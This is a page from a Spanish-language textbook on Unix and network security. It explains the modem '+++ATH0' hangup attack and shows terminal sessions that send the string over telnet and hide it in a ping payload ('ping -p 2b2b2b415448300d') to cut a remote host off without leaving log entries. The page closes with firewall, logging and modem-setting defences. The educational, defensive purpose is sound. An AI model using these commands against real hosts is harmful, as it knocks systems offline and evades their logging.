SEGURIDAD EN UNIX Y REDES

166CAPÍTULO 10. EL SISTEMA DE REDreciben la orden ‘+++’, y muchos de ellos lo hacen también al recibir remotamente esta secuenciade control. Así, podemos conectar a un puerto donde se ofrezca determinado servicio (como ftp osmtp) en un host con un módem de estas características y colgar el módem remoto sin levantarnosde la silla, simplemente enviando la cadena ‘+++’ seguida de una orden de colgado como ‘ATH0’:luisa:~# telnet XXX.XXX.X.XX 21Trying XXX.XXX.X.XX...Connected to XXX.XXX.X.XX.Escape character is ’^]’.220 gema FTP server (Version wu-2.4.2-academ[BETA-15](1) Fri Oct 2200:38:20 CDT 1999) ready.USER +++ATH0^]telnet> closeConnection closed.luisa:~# telnet XXX.XXX.X.XXTrying XXX.XXX.X.XX...telnet: Unable to connect to remote host: Network is unreachableluisa:~#Bien pero, ¿dónde entra ping en este ataque? Muy sencillo: al conectar a un servicio para enviarla cadena de caracteres, lo habitual es que el sistema remoto registre la conexión, aunque luego sumódem cuelgue. En cambio, muy pocos sistemas registran en los logs un simple ping, por lo queesta orden se convierte en un mecanismo que algunos piratas utilizan para no dejar rastro de susacciones; esto se consigue de una forma muy sencilla: en la utilidad ping de la mayoría de Unicesexiste un parámetro que permite especificar el contenido del paquete enviado (por ejemplo, ‘-p’en Linux), por lo que simplemente hemos de insertar (en hexadecimal) la cadena ‘+++ATH0’ en latrama que enviamos al sistema remoto:luisa:~# ping -c 1 XXX.XXX.X.XXPING XXX.XXX.X.XX (XXX.XXX.X.XX): 56 data bytes64 bytes from XXX.XXX.X.XX: icmp_seq=0 ttl=255 time=0.2 ms--- XXX.XXX.X.XX ping statistics ---1 packets transmitted, 1 packets received, 0% packet lossround-trip min/avg/max = 6.5/6.5/6.5 msluisa:~# ping -p 2b2b2b415448300d XXX.XXX.X.XXPING XXX.XXX.X.XX (XXX.XXX.X.XX): 56 data bytes^C--- XXX.XXX.X.XX ping statistics ---1 packets transmitted, 0 packets received, 100% packet lossluisa:~# telnet XXX.XXX.X.XXTrying XXX.XXX.X.XX...telnet: Unable to connect to remote host: Network is unreachableluisa:~#Para evitar los problemas relacionados con los paquetes icmp que sistemas remotos puedan enviara nuestra máquina puede ser conveniente filtrar dicho protocolo mediante un cortafuegos (inclusosituado en el propio equipo); si no tenemos esta posibilidad, al menos es interesante registrar lastramas de este tipo que llegan hasta nuestra máquina, con programas como icmpinfo (si hacemosesto, hemos de tener cuidado con las negaciones de servicio ocasionadas por una cantidad de logsexcesiva en el disco duro).Ah, si es nuestro módem el que presenta el problema que acabamos de comentar, podemos solucionarlomediante la cadena de inicialización ‘s2=255’.